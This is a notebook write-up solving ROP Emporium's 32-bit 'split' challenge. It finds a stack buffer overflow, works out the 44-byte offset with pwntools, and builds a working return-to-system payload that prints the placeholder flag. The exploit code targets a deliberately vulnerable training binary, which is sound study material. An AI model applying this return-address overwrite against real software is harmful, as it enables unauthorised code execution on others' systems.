# Solution for Split - ROP Emporium - x86

In [1]:
import pwn
from pwn import *

Let's analyse the code and see what we're working with
```text
split32: ELF 32-bit LSB executable,
```
Let's see what the options on the binary are
```text
gdb-peda checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
```
Now that we have a good idea, let's go further and analyse the functions,
```text
0x08048546  main
0x080485ad  pwnme
0x0804860c  usefulFunction
```

The main only calls the pwnme function
In the pwnme function, there is a buffer overflow. 
Buffer is of size 32 and input is allowed of 96 bytes
There is also an interesting function called usefulFunction that calls
```text
system("/bin/ls")
```
The challenge suggests we can use the system function. Then let's also search the strings in the program in that case, because NX is enabled
```text
0804a030	usefulString	ds "/bin/cat flag.txt"	"/bin/cat flag.txt"	string	18	true
```
Now we have the address of a string that is called "cat flag.txt". Now we only have to effectively call 
system("cat flag.txt") and we have the flag.
Let's get started. 

In [2]:
p = process('./split32')
elf = ELF('./split32')

[x] Starting local process './split32'
[+] Starting local process './split32': pid 14359
[*] '/home/hanoz/Desktop/ropemporium/split/split32/split32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)


In [3]:
init_recvd = p.recv()
print(init_recvd)

b'split by ROP Emporium\nx86\n\nContriving a reason to ask user for data...\n> '


In [5]:
x = 50
payload = cyclic(x,n=4) 
p.sendline(payload)

p.wait()
core = p.corefile

offset = cyclic_find(core.fault_addr)
log.success("We have found the offset at location " + str(offset))

[*] Process './split32' stopped with exit code -11 (SIGSEGV) (pid 14290)
[x] Parsing corefile...
[*] '/home/hanoz/Desktop/ropemporium/split/split32/core.14290'
    Arch:      i386-32-little
    EIP:       0x6161616c
    ESP:       0xffb85730
    Exe:       '/home/hanoz/Desktop/ropemporium/split/split32/split32' (0x8048000)
    Fault:     0x6161616c
[+] Parsing corefile...: Done
[+] We have found the offset at location 44


In [6]:
buffer = b"A"*44
system_addr = elf.symbols['system']
system_addr_pld = p32(system_addr)
cat_flag_addr = 0x0804a030
cat_flag_addr_pld = p32(cat_flag_addr)
payload = buffer + system_addr_pld + b"BBBB" + cat_flag_addr_pld
p.sendline(payload)

In [7]:
flag_line = p.recvuntil("}")
print(flag_line)

[*] Process './split32' stopped with exit code -11 (SIGSEGV) (pid 14359)
b'Thank you!\nROPE{a_placeholder_32byte_flag!}'


/tmp/ipykernel_14346/1118392199.py:1: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  flag_line = p.recvuntil("}")
